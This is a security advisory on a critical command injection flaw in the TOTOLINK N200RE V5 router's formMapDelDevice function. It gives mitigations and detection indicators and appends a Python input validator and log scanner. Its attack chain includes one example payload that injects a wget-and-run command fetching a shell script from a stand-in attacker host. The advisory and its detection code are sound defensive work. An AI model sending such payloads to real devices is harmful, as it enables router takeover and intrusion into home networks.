Executive Summary
A critical command injection vulnerability (CVE-2026-36841) has been disclosed in the TOTOLINK N200RE V5 router. The flaw exists in the formMapDelDevice function, where the macstr and bandstr parameters are passed to system commands without proper sanitization. With a CVSS score of 9.8 (Critical), this vulnerability enables unauthenticated remote code execution with no user interaction required.
CVSS Score: 9.8 (Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
TOTOLINK N200RE V5 is a consumer and small-business Wi-Fi router. Routers of this type are frequently exposed directly to the internet or used in home office environments with minimal network segmentation, making this vulnerability particularly dangerous to end users.
Vulnerability Overview
| Attribute | Value |
|---|---|
| CVE ID | CVE-2026-36841 |
| CVSS Score | 9.8 (Critical) |
| Type | Command Injection (OS Command Injection) |
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | None |
| User Interaction | None |
| Scope | Unchanged |
| Confidentiality / Integrity / Availability | High / High / High |
| Published | 2026-04-29 |
| Affected Component | formMapDelDevice function |
| Vulnerable Parameters | macstr, bandstr |
Affected Products
| Product | Version | Status |
|---|---|---|
| TOTOLINK N200RE | V5 | Vulnerable — patch status unknown |
Technical Details
What Is a Command Injection Vulnerability?
A command injection flaw occurs when user-supplied input is incorporated into an OS-level command without adequate sanitization or escaping. An attacker can inject additional shell commands using metacharacters (;, |, &&, `), which the underlying shell then executes with the privileges of the vulnerable application — often root in the case of embedded router firmware.
Vulnerable Function: formMapDelDevice
The formMapDelDevice function in the TOTOLINK N200RE V5 firmware handles the deletion of devices from a network map. Both the macstr and bandstr parameters accept user-controlled input that is concatenated into shell commands without sanitization.
Attack Chain
1. Attacker identifies TOTOLINK N200RE V5 accessible on the network
2. Attacker crafts an HTTP request to the formMapDelDevice endpoint
3. Malicious payload injected into macstr or bandstr parameter:
e.g., macstr=AA:BB:CC:DD:EE:FF;wget http://attacker.com/shell.sh -O /tmp/shell.sh;sh /tmp/shell.sh
4. Router firmware executes the injected commands as root
5. Attacker achieves full persistent control over the device
6. Attacker pivots to devices on the LAN or modifies DNS/routing tables
Why CVSS 9.8?
The near-maximum score reflects: no authentication required, no user interaction, network accessibility, and low attack complexity. All three impact dimensions (Confidentiality, Integrity, Availability) are rated High, as full RCE gives an attacker unrestricted access to the device and the network behind it.
Impact Assessment
| Impact Area | Description |
|---|---|
| Remote Code Execution | Full code execution on the router as root |
| Network Pivoting | Attacker gains foothold inside the LAN |
| DNS Hijacking | Modify upstream DNS to redirect traffic or enable phishing |
| Credential Theft | Intercept unencrypted network traffic from LAN clients |
| Botnet Recruitment | Router added to a botnet for DDoS, spam, or proxy services |
| Persistent Backdoor | Attacker installs persistent implant in router firmware |
| Traffic Interception | Man-in-the-middle attacks against LAN devices |
Recommendations
Immediate Actions
- Check your router model and firmware version — Determine if your TOTOLINK N200RE is running V5 firmware
- Check for a firmware update — Visit the TOTOLINK support portal for any available patches for the N200RE V5
- Disable remote management — Ensure the router's web interface is not accessible from the WAN/internet side
- Place behind a firewall — If the router must remain in service, ensure it is not directly internet-exposed
Network-Level Mitigations
- Block inbound access to the router's web management interface from external IPs
- Restrict LAN-side access to the admin interface to specific trusted IP addresses
- Consider placing the router behind an upstream firewall that filters inbound connections
- Monitor outbound connections from the router for unexpected destinations
Longer-Term Recommendations
- Replace the device if no firmware patch is released in a reasonable timeframe — TOTOLINK N200RE V5 may be end-of-life
- Upgrade to a supported router from a vendor with a track record of security patching
- Segment your network — Isolate IoT and consumer devices from workstations and servers
- Enable router logging and monitor for unusual processes or outbound traffic
Detection Indicators
| Indicator | Description |
|---|---|
| Unexpected outbound connections from the router | Possible C2 or exfiltration |
| DNS resolution changes on LAN clients | Potential DNS hijack via compromised router |
| New admin accounts on the router | Post-exploitation persistence mechanism |
| Unusual CPU/memory usage on the router | May indicate cryptominer or botnet activity |
| HTTP requests to formMapDelDevice with shell metacharacters | Active exploitation attempt |
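As an added example (not code from the advisory or from TOTOLINK firmware), the Python below implements the allowlist validation the advisory says formMapDelDevice lacks for macstr and bandstr, and reuses the same check to flag the detection indicator above (requests to formMapDelDevice carrying shell metacharacters) over constructed access-log lines. The endpoint path, the band labels, the metacharacter set and the log format are assumptions, not details taken from the device.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumed allowlists for the two parameters the advisory names; a real
# implementation would take the band labels from the device's own config.
MAC_RE = re.compile(r"^[0-9A-Fa-f]{2}(:[0-9A-Fa-f]{2}){5}$")
ALLOWED_BANDS = {"2.4G", "5G"}
SHELL_META = set(";|&`$()<>\n\r'\"")    # must never reach a shell command
ENDPOINT = "formMapDelDevice"            # assumed to appear in the request target
REQ_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def is_valid_macstr(value):
    return bool(MAC_RE.match(value))

def is_valid_bandstr(value):
    return value in ALLOWED_BANDS

def check_params(encoded):
    """Validate a query string or x-www-form-urlencoded body.
    Returns a list of (param, reason); an empty list means every value is clean."""
    findings = []
    for name, values in parse_qs(encoded, keep_blank_values=True).items():
        for val in values:   # parse_qs has already percent-decoded the value
            if any(c in SHELL_META for c in val):
                findings.append((name, "shell metacharacter"))
            elif name == "macstr" and not is_valid_macstr(val):
                findings.append((name, "not a MAC address"))
            elif name == "bandstr" and not is_valid_bandstr(val):
                findings.append((name, "unexpected band label"))
    return findings

def scan_access_log(lines):
    """Yield (line_no, findings) for request lines that hit the endpoint with
    bad parameters. Access logs only show the request line; run check_params()
    on captured POST bodies too, since form data is not logged there."""
    for n, line in enumerate(lines, 1):
        m = REQ_LINE.search(line)
        if not m or ENDPOINT not in unquote(m.group("target")):
            continue
        findings = check_params(urlsplit(m.group("target")).query)
        if findings:
            yield n, findings

# Constructed sample lines (not real traffic): a benign deletion, an injection
# attempt with a percent-encoded ';', and an unrelated request.
SAMPLE_LOG = [
    '192.168.0.10 - - [29/Apr/2026:10:00:01 +0000] "GET /formMapDelDevice?macstr=AA:BB:CC:DD:EE:FF&bandstr=5G HTTP/1.1" 200 12',
    '203.0.113.5 - - [29/Apr/2026:10:00:02 +0000] "GET /formMapDelDevice?macstr=AA:BB:CC:DD:EE:FF%3Bid&bandstr=5G HTTP/1.1" 200 12',
    '192.168.0.10 - - [29/Apr/2026:10:00:03 +0000] "GET /index.html HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for line_no, findings in scan_access_log(SAMPLE_LOG):
        print(f"line {line_no}: {findings}")
```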
Post-Remediation Checklist
- Confirm firmware patched or device replaced
- Reset router to factory defaults after patching — existing compromise may persist
- Change all admin credentials after reset
- Review LAN devices for signs of compromise resulting from router control
- Update DNS settings on all LAN clients to ensure they point to trusted resolvers
- Monitor network traffic for anomalies for at least 30 days post-remediation